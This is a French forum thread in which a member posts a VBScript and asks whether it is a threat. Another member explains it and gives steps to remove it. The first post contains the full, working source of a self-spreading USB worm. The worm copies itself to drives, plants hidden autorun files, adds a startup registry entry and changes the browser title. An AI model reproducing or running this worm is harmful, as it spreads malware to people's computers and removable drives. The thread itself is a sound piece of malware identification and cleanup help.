Razi3L Admin
Nombre de messages : 998 Age : 38 Localisation : DTC Fonction : Maître Suprême Hobbie : La Tyranie Date d'inscription : 13/06/2006
Feuille de personnage LVL: (3/10) Pts de destin: 1 XP force: 3
| Sujet: J'ai besion de toi Scratt Ven 25 Mai - 2:03 | |
| Ce vbs fait quoi? A quoi il sert? C'est une menace? - Code:
-
'My name is Slow but sure V0.05 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if next set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
| |
|
Crash.8 Modos
Nombre de messages : 1382 Age : 40 Localisation : Sur Terre Fonction : Ma fonction actuelle Hobbie : Mes hobbies bien sur..... programmer Date d'inscription : 22/06/2006
Feuille de personnage LVL: (2/10) Pts de destin: 1 XP force: 1
| Sujet: Re: J'ai besion de toi Scratt Ven 25 Mai - 5:15 | |
| C'est un petit virus..... je dirai mieux un parasite de mer*eVoici ce qu'il fait en détail : - il commence par se copier dans "c:\windows\system32" sous le nom de "MS32DLL.dll.vbs" en attribut archive - il se copie aussi sur tous les lecteurs amovibles (clé USB) et lecteurs fixes (disque dur) dans la racine en attribut caché - il ajoute à ces lecteurs un fichier "autorun.ini", en attribut caché, qui permet de le lancer lors qu'on ouvre le lecteur en question - il ajoute dans le registre une entrée pour le lancer au démarrage sous le nom "MS32DLL" - il change le titre de IE en mettant à la place "Hacked by Godzilla" - si le disque qui la éxecuterest un lecteur fixe, il attend 200s puis recommence la copie dans les lecteurs amovible sinon il se relance..... Voilà.... j'espére que tu ne là pas lancer..... c'est bizarre mais il ressemble à l'article que j'avais mit làPour s'en débarraser : - supprimer le fichier "MS32DLL.dll.vbs" dans "c:\windows\system32" - exécuter "msconfig" pour enlever le programme au démarrage - ecrire dans le regitre à la clé "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title" = "Windows Internet Explorer" ou autre chose au choix - et biensur, déactiver le lancement automatique des clés USB - et afficher les fichiers cachées pour le supprimer sur les clés.... Sinon les antivirus doivent le connaître.... | |
|
Razi3L Admin
Nombre de messages : 998 Age : 38 Localisation : DTC Fonction : Maître Suprême Hobbie : La Tyranie Date d'inscription : 13/06/2006
Feuille de personnage LVL: (3/10) Pts de destin: 1 XP force: 3
| Sujet: Re: J'ai besion de toi Scratt Ven 25 Mai - 7:37 | |
| | |
|
Crash.8 Modos
Nombre de messages : 1382 Age : 40 Localisation : Sur Terre Fonction : Ma fonction actuelle Hobbie : Mes hobbies bien sur..... programmer Date d'inscription : 22/06/2006
Feuille de personnage LVL: (2/10) Pts de destin: 1 XP force: 1
| |
Admin Admin
Nombre de messages : 1534 Age : 39 Localisation : Ici et nul part ailleurs Fonction : Admin tout puissant Hobbie : Faire chier tout le monde ! Niak ! Date d'inscription : 04/06/2006
Feuille de personnage LVL: (2/10) Pts de destin: 1 XP force: 2
| Sujet: Re: J'ai besion de toi Scratt Lun 28 Mai - 16:03 | |
| Mais il fait quoi exactement ce truc ?! J'espère que je l'ai pas moi... Je suis une des sources mère d'information net du barbare et j'ai toujours des pages qui s'ouvent toute seule maintenant quand je suis sur le net... Je sais pas si c'est 2 trucs sont lié mais je me pose des questions... la prochaine fois que t'es sur g*** pourras(tu passer me faire une bonne mise à jour de mon anti virus et un bon nettoyage des fichiers inutiles etc etc etc ?! please | |
|
Razi3L Admin
Nombre de messages : 998 Age : 38 Localisation : DTC Fonction : Maître Suprême Hobbie : La Tyranie Date d'inscription : 13/06/2006
Feuille de personnage LVL: (3/10) Pts de destin: 1 XP force: 3
| Sujet: Re: J'ai besion de toi Scratt Mar 29 Mai - 1:42 | |
| t'inkiet, je ne te l'ai pas filé. Je connais le traitre qui véhicule cette m***e | |
|
Crash.8 Modos
Nombre de messages : 1382 Age : 40 Localisation : Sur Terre Fonction : Ma fonction actuelle Hobbie : Mes hobbies bien sur..... programmer Date d'inscription : 22/06/2006
Feuille de personnage LVL: (2/10) Pts de destin: 1 XP force: 1
| Sujet: Re: J'ai besion de toi Scratt Mar 29 Mai - 2:46 | |
| Tryskell, se qu'il fait le lait expliquer... il se copie juste de clé USB en clé USB, et affiche Hacked by Godzilla dans IE...... c'est pas mortel mais chiant..... Je te ferais un bon nettoyage ma petite Tryskell adorée.... | |
|
Contenu sponsorisé
| Sujet: Re: J'ai besion de toi Scratt | |
| |
|